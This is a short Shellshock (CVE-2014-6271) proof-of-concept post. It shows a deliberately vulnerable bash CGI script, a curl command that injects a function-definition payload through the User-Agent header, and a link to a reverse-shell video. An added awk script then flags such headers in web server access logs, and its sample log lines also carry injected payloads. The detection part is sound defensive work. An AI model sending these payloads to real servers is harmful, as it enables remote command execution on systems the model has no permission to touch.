By exploiting the Shellshock vulnerability it is possible to spawn a "reverse shell" and take remote control of the victim.
PoC:
1. There is a vulnerable CGI. For example: http://198.168.1.1/cgi-bin/victim.cgi
2. Code of the vulnerable CGI:
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>Demo Shellshock Exploit (CVE-2014-6271)</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
3. On the attacker's machine, run:
curl -A "() { foo;};echo;/bin/echo vulnerable" http://192.168.1.1/cgi-bin/victim.cgi
The following exploit video shows in detail how a "reverse shell" is obtained by exploiting Shellshock.
https://www.youtube.com/watch?v=a6FmnUSEkKM
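From the defender's side, the request in step 3 leaves a recognizable trace in the web server's access log: a header value that begins with "() {". The script below is an added example, not part of the original post; it assumes the Apache combined log format, and the function names and sample log lines are constructed for illustration.

```shell
# Added example (not from the original post): list access-log entries whose
# Referer or User-Agent begins with a Shellshock-style function definition.

# Constructed sample in Apache combined log format. Client addresses come
# from the documentation range 192.0.2.0/24; the path is the one in the PoC.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.66 - - [25/Sep/2014:10:00:07 +0000] "GET /cgi-bin/victim.cgi HTTP/1.1" 200 1024 "-" "() { foo;};echo;/bin/echo vulnerable"
192.0.2.67 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/victim.cgi HTTP/1.1" 200 1024 "() { :;}; /bin/true" "curl/7.38.0"
192.0.2.11 - - [25/Sep/2014:10:00:12 +0000] "GET /cgi-bin/victim.cgi HTTP/1.1" 200 1024 "-" "docs-bot (see () { notes)"
EOF
}

# Print "<client> <field> <value>" for every flagged header.
# Reads the files given as arguments, or standard input when there are none.
shellshock_hits() {
    awk -F'"' '
        function flag(name, value,    head) {
            # Rule used here: an unpatched bash imports an environment value
            # as a function only when it starts with the 4 characters "() {",
            # so a mid-string occurrence (last sample line) is not flagged.
            if (substr(value, 1, 4) == "() {") {
                split($1, head, " ")
                printf "%s %s %s\n", head[1], name, value
            }
        }
        # Splitting on the double quote puts Referer in $4, User-Agent in $6.
        { flag("referer", $4); flag("user-agent", $6) }
    ' "$@"
}

# Number of flagged headers, for alerting thresholds or cron reports.
shellshock_hit_count() {
    shellshock_hits "$@" | wc -l | tr -d ' '
}

# Demonstration run on the constructed sample.
sample_log | shellshock_hits
```

Headers the server does not log, such as Cookie or custom headers, also reach the CGI environment, so an empty result does not rule out an attempt.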